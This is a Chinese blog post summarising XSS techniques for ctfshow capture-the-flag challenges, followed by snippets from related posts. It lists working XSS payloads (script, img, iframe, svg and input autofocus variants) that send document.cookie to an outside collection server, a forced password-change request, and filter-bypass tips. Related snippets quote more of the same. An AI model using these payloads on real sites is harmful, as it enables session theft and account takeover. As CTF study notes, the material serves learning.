2022/1/5ctfshowXSS小结

最新推荐文章于 2024-07-31 13:21:53 发布

专注pwn0年

最新推荐文章于 2024-07-31 13:21:53 发布

阅读量389

点赞数

分类专栏： CTF 文章标签： javascript php ajax

本文链接：https://blog.csdn.net/qq_46241655/article/details/122318299

版权

CTF 专栏收录该内容

38 篇文章 1 订阅

订阅专栏

测试输入框
用户名
密码等
会写JavaScript外带
burp suite找到处理页面

外带

<script>window.location.href='http://www.yuxuanzhe.com/x.php?1='+document.cookie;</script>

处理后外带

<script>window.open('http://www.yuxuanzhe.com/tmp/flag.txt'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

外带

<iframe	onload="window.open('http://www.yuxuanzhe.com/x.php?1='+document.cookie)"></iframe>

post传参

<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>

外带

<script>
    var img = document.createElement("img");
    img.src = "http://www.yuxuanzhe.com/x.php/?1=" + document.cookie;
</script>

这个虽然是图片，但还是有效果。这个代码要加载资源就要访问后面的url，无论这个url是否真的是图片，它终究还是get提交了cookie。
其他更多的也是同理

<input onfocus="window.open('http://www.yuxuanzhe.com/x.php/?1=' + document.cookie)" autofocus>

<svg onload="window.open('http://www.yuxuanzhe.com/x.php/?1=' + document.cookie)">

过滤空格可以用/和/**/绕过

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

专注pwn0年

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CTFshow XSS(web316-333)

Kradress的博客

03-18

769

这里我们发现管理员才能查看用户名和密码，如果我们在注册的时候写入xss的payload，就会在用户管理界面执行我们的xss代码。这题没有过滤什么，但是如果用img的话，拿不到flag，但是referer是bot，我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用，可能cookie失效了。这题拿cookie也看不到flag了，不过多了一个修改密码选项。随便注册一个用户test，余额只有6块，买flag要9999元。发现输出为空，说明被题目限制了，但是。可以用frame注入。

ctfshow-xss(web316-web330)

m0_72125469的博客

07-03

1322

web317讲解相当细致精致练习XSSweb316这道题估计陆陆续续弄了半天因为xss可以说基本不会还好最终彻彻底底明白了首先这道题是反射性xss 也就是必须点击某一个xss链接才能达到xss效果这道题的意思就是写一个祝福语生成链接发送给朋友这个祝福语的位置就是我们实现XSS的位置已知：flag在BOT(程序，机器人)的cookie中并且生成的链接后端BOT会每隔一段时间访问所以要构造一个含有XSS的链接使得管理员只要访问就能获取BOT的cookie。

参与评论您还未登录，请先登录后发表或查看评论

ctfshow XSS

quan9i的博客

06-28

1519

ctfshow XSS 316-333

CTFshow_XSS与xss-labs全关卡万字通关笔记

最新发布

dasdasdasvsdV的博客

07-31

312

反射型非持久型，常见的就是在URL中构造，将恶意链接发送给目标用户。当用户访问该链接时候，会向服务器发起一个GET请求来访问带有恶意代码的链接。造成反射型XSS主要是GET类型。存储型持久型，常见的就是在博客留言板、反馈投诉、论坛评论等位置，将恶意代码和正文都存入服务端（数据库、内存、文件系统等），每次访问都会触发恶意代码。DOM型DOM型XSS其实是一种特殊类型的反射型XSS，也被称作本地跨站，它是基于DOM文档对象模型的一种漏洞。

ctfshowXSS

njh18790816639的博客

05-19

342

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。大致的介绍一下XSS漏洞！此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.

CTFShow Xss

paidx0

08-12

1424

CTFShow Xss（学习）简单介绍一下Xss 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。 xss漏洞关键就是寻找参数未过滤的输出函数。常见的输出函数有： echo printf print print_r sprintf die var-dump var_export xss 分类：（三类）反射型XSS：<非持久化> 攻击者事先制作好攻击链接, 需要欺

CTFSHOW-XSS

Yb_140的博客

05-13

246

我们先注册一个账号，如果为admin提示不可注册，我们注册一个admin1。payload还是上面的，写在信的内容处，同时注意收件人是admin。先在自己的服务器上开启一个web服务，用来接收flag。前面都是反射型，这题开始是存储型。目的：拿到管理员的cookie。上面的payload不能用了。payload同上.

CTFshow——XSS

D.MIND 的博客

04-01

628

文章目录web316web317——过滤了scriptweb318——过滤了imgweb319——web320、321、322——过滤空格 web316 利用xss平台里的代码进行攻击： https://xss.pt/xss.php <sCRiPt sRC=//xss.pt/kUIB></sCrIpT> web317——过滤了script <img src=x onerror=s=createElement('script');body.appendChild(s);s.sr

ctfshow——XSS

qq_55202378的博客

04-24

1255

跨站脚本攻击（Cross Site Scripting），为不和层叠样式表（Cascading Style Sheets，CSS）的缩写混淆，故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码，当用户浏览该页之时，嵌入其中 Web 里面的 HTML 代码会被执行，从而达到恶意攻击用户的特殊目的。

ctfshow—XSS

cosmoslin的博客

02-05

986

web 316(反射型) 测试<script>alert(1)</script>，无过滤在服务器上开启监听 python3 -m http.server 39543 外带数据： <script>location.href="http://x.xx.xx.xx:39543/"+document.cookie</script> <script>window.location.href="http://x.xx.xx.xx:39543/"+docu

CTFSHOW xss篇

羽的博客

12-28

9366

web316 xss平台 https://xss.pt/xss.php 创建项目选择默认模块一直下一步，然后随便那个代码放到题目输入框中再刷新下题目最后看下项目结束

ctfshow之xss(有图易操作)

qq_50589021的博客

08-14

681

XSS平台 document.cookie 获取饼干的js代码推荐xss平台：http://xsscom.com/ ， https://xss.pt/ JavaScript的 document.cookie 将以字符串的方式返回所有的cookie，类型格式： cookie1=value; cookie2=value; cookie3=value; 2021-08-06 web316(反射型) 利用xss平台里的代码进行攻击： http://xsscom.com/ 建造完项目以后，复制代码： <sc

ctfshow XSS专题

yink12138的博客

12-17

1512

ctfshow XSS专题

CTFShow Web 入门 XSS

tj13995958709的博客

04-14

2061

这一题用上一题的做法就不行，这一题admin的cookie是一直在变的，而且很快，看到此题还有修改密码的功能，注册个普通账号，在修改密码时抓包。当将这行脚本代码提交后，稍等片刻，会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接，然后就可以拿到admin的cookie。这道题它代码逻辑有问题，转账的不扣转账方的金额，所以可以一直向自己转账，转的金额不超过自己余额即可。直接让admin转自己10000，和上题让admin自己改密码思路是一样的。然后登录admin账号，密码输入123456。

ctfshow web入门 xss（持续更新）

Lum1n0us's Blog

08-07

594

文章目录前言web316web317web318-319web320-325 前言因为各种各样的问题，我这里就只让他弹窗，而不把获取flag作为目标了 web316 第一关，很简单，没有过滤，直接 <script>alert(0)</script> 就能弹窗 web317 有过滤了，可能是把script过滤了，可以用img标签 <img src=1 onerror=alert(0)> web318-319 img标签也被过滤了，可以用body标签，它被ban的概率比

CTFshow-WEB入门-XSS

feng的博客

02-28

6638

前言因为不太会javascript，所以对于xss的了解一直比较少，也不太会，这次做一下xss专题，学习一下xss。 web316 圣诞快乐，写下祝福语，生成链接，发送给朋友，可以领取十个鸡蛋！意思是要生成链接，应该就还是获得管理员cookie这样的题目，大师傅们说题目的bot是每隔一段时间自动点击的。可以利用xss平台： XSS平台以后我都用自己vps。首先测试一下<script>alert(1)</script>，弹窗成功，第一题应该是没有任何的过滤，所以直接打co

ctfshow XSS漏洞web316-328

m0_62584974的博客

04-07

1910

2022/4/7 Web316 XSS 反射性XSS 圣诞快乐，写下祝福语，生成链接，发送给朋友，可以领取十个鸡蛋！ CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名红框内的是临时的域名然后在方框中输入： <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..

ctf_show笔记篇（web入门---XSS）

whale_waves的博客

04-01

1354

这里简单对xss做一个了解：xss分为反射型和储存型反射型：一般是由攻击者选择攻击对象，对攻击对象发一个带有xss窃取cookie的页面的url，被攻击者点击就会动过document.cookie将用户信息一并发送给攻击方的服务器。反射型XSS一般发生在浏览器，当受害者访问含有XSS代码的页面时浏览器解析并执行XSS代码造成信息泄露。存储型：攻击方将恶意代码插入在存在漏洞的网站上，任何访问网站的人都会遭到攻击，比起反射型xss，存储型xss危害更大，范围更广。